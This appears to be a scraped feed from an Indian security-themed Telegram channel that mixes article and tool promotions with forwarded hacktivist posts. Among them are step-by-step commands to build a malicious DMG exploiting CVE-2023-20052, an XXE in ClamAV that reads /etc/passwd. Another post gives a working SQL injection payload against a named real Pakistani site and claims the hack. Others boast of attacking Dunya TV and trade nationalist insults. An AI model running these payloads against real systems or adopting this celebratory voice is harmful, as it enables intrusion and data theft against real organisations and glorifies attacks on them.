CrackCodes ๐Ÿ‡ฎ๐Ÿ‡ณ
15.9K subscribers
1.89K photos
387 videos
722 files
3.67K links
Official Websites: https://crackcodes.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
About Admin: prapattimynk.crackcodes.in


Be Secure~
เคœเคฏ เคถเฅเคฐเฅ€ เคฐเคพเคฎ
Download Telegram
Forwarded from CYBER DEMONS (INDIA๐Ÿ‡ฎ๐Ÿ‡ณ) ๐Ÿค–CHANNEL๐Ÿค– (แดดแดฌแถœแดทแดธแดผแถœแดท)
PHISHING - DON'T BE A VICTIM

( AUDIO VERSION )

Learn how to protect yourself from phishing attacks with our comprehensive guide โ€ Phishing : Donโ€™t Be A Victim โ€ . Discover the different types of phishing and how to identify them, as well as the preventative measures you can take to safeguard yourself from cybercrime. Donโ€™t let scammers trick you into handing over sensitive information โ€“ read our guide now and stay safe online! ๐Ÿ”ฅ๐Ÿ˜พ

LISTEN FULL๐Ÿ‘‡๐Ÿ‘‡

https://cyberdemonsindia.42web.io/cyber-security/learn-with-podcasts/
๐Ÿ’ฅCVE-2023-20052 exploit

To create malicious DMG file:

$ git clone
https://github.com/XXXXXXXX/CVE-2023-XXXX.git
$ cd CVE-2023-20052
$ sudo docker build -t cve-2023-20052 .
$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash
$ genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
$ bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "
http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg
To trigger exploit:

$ clamscan --debug exploit.dmg
๐Ÿ‘Œ1
Forwarded from CYBER DEMONS (INDIA๐Ÿ‡ฎ๐Ÿ‡ณ) ๐Ÿค–CHANNEL๐Ÿค– (แดดแดฌแถœแดทแดธแดผแถœแดท)
CHIT CHAT ON SOC ๐Ÿ‘ฝ WITH

@abhinavkakku ( SOC ANALYST) BHAIYA

AT @cyberdemonsindiaa

TIME - 8:00 PM TODAY ( AFTER HALF AN HOUR )

#hacker_bano_chutiya_nahi ๐Ÿ‘Œ
Make Your Machineโ€™s Static Address | Port Forwarding Without Router | Static Address (New Method) Life Time Port forwarding

Port forwarding, also known as port management, Allows remote servers and devices on the internet to be able to access devices that are on a private network. If you are not using port forwarding, only devices on that private internal network can have access to each other or your network.

Read Full Article: https://bit.ly/Port_Forwarding
This media is not supported in your browser
VIEW IN TELEGRAM
โค9โคโ€๐Ÿ”ฅ2
National Technology Day !

Jai Hind ๐Ÿ‡ฎ๐Ÿ‡ณ
โšก6๐Ÿค“1
The Cost of Cybercrime

The Story of How Rahulโ€™s Actions Led to Serious Consequences

ISKE BARE ME JYADA NAHI BTAUNGA โค๏ธPADHO JAKE ACHA LAGEGA


READ FULL STORY BLOG ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡

http://cyberdemonsindia.42web.io/cyber-security/short-stories-cyber-security/the-cost-of-cybercrime-the-story-of-how-rahuls-actions-led-to-serious-consequences/

#hacker_bano_chutiya_nahi
Point no 2 summarizes the state of Pakistan.

Viral Letter ๐Ÿ”บ@AngrySaffron
๐Ÿ˜ฑ7๐Ÿ‘1๐Ÿ’”1
Media is too big
VIEW IN TELEGRAM
BIG โšก๏ธโšก๏ธ Leaked Recording ๐Ÿšจ Another Hassan Siddiqui from Pak Armed Forces exposed themselves !!
๐˜ฝ๐™ช๐™œ ๐™๐™ฎ๐™ฅ๐™š: Stored XSS

๐˜พ๐™ค๐™ช๐™ง๐™จ๐™š ๐™‡๐™ž๐™ฃ๐™  : https://youtube.com/watch?v=uUmMc05iFuo&feature=share

Please Share your views
&
๐™Ž๐™ช๐™—๐™จ๐™˜๐™ง๐™ž๐™—๐™š ๐™ฉ๐™ค ๐™ค๐™ช๐™ง ๐™”๐™ค๐™ช๐™๐™ช๐™—๐™š ๐™˜๐™๐™–๐™ฃ๐™ฃ๐™š๐™ก๐Ÿ™๐Ÿป

๐™๐™๐™–๐™ฃ๐™ ๐™จ ๐™›๐™ค๐™ง ๐™ฎ๐™ค๐™ช๐™ง ๐™Ž๐™ช๐™ฅ๐™ฅ๐™ค๐™ง๐™ฉ. โ˜บ๏ธ
Tricks You Must Know In Offensive Cyber Security (Must Read)

In this article Iโ€™m going to document a few techniques, commands and small things that make my day-day testing life easier, and that might just make your life more enjoyable!

Read Article: https://bit.ly/Tricks_Offensive_Cyber_Security
โค3
Invoke-ADEnum

Active Directory Enumerator - Automate Active Directory Enumeration using PowerView.
๐Ÿ‘1
Port Forwarding With a Lifetime Static Address Without Router Video

Watch Video:
https://system32.ink/news-feed/p/356/

Direct Link:
https://system32.ink/bb-video-preview/Zm9yYmlkZGVuXzEzODA=/Zm9yYmlkZGVuXzEx
โคโ€๐Ÿ”ฅ1
SubDomainizer

A tool to find subdomains and interesting things hidden inside, external Javascript files of page, folder, and Github.
Forwarded from pkg
Pakistan Biggest Urdu News Channel is under cyber attack.


Dunyatv Firewall Server Pic is kept for Representation. (Yes that pc from which pakis adding their unhacked servers into firewall assuming that they can kick us out, Lol xD)


Hi, Dunyatv when your soc's assessment completes and when you are assured that you successfully removed us from your firewall server or infra do ping insta : @pkg__divi ( Yours security personnel's Father )
๐Ÿ”ฅ4
Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE)

Get a working portable Python/Git/Java environment on Windows in SECONDS without having local administrator, regardless of your broken Python environment. Our open-source script downloads directly from proper sources without any binaries. While the code may not be perfect, it includes many useful PowerShell tricks.
This media is not supported in your browser
VIEW IN TELEGRAM
wpfinger | WordPress scanning tool.

โ€ข Core version detection
โ€ข Plugin scanning through fingerprinting
โ€ข Vulnerability output, using database from Wordfence
๐Ÿ”ฅ2๐Ÿ’”1
๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป Learn How to Get CYBER SECURITY INTERNSHIP๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป

๐ŸŒ€Want to get cyber security internship? If yes then you don't have to miss this๐Ÿ˜
Know about secret and amazing tips which will surely work for youโ—

๐Ÿ”ดLink: https://pentestingguide.com/how-to-get-cyber-security-internship/

โค๏ธSHARE WITH LOVE๐Ÿ˜˜
๐Ÿ‘1
Forwarded from CYBER DEMONS (INDIA๐Ÿ‡ฎ๐Ÿ‡ณ) ๐Ÿค–CHANNEL๐Ÿค– (แดดแดฌแถœแดทแดธแดผแถœแดท)
SITE URL - https://www.comand.edu.pk/

PAYLOAD - id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9657=9657-- kGMX

KHUD KE DESH KI SECURITYB SAMBHALO PEHLE CHUTIYO ๐Ÿ˜‚๐Ÿ˜‚

HACKED BY -
CYBER DEMONS INDIA ๐Ÿ‡ฎ๐Ÿ‡ณ

JAY SHREE RAAM ๐Ÿค’๐Ÿ™๐Ÿ‡ฎ๐Ÿ‡ณโค๏ธโค๏ธ
โค1
New Article is Out Check โœ…

Title : Top 7 Types of Operating System Used in Cyber Security

Hello and welcome back, fellow hackers, to another exciting article from yours truly. ๐Ÿคฉ

Today, weโ€™re going to dive into the fascinating world of operating systems used in cyber security.

Read Full Here ๐Ÿ‘‡
https://bit.ly/3NZ2b6x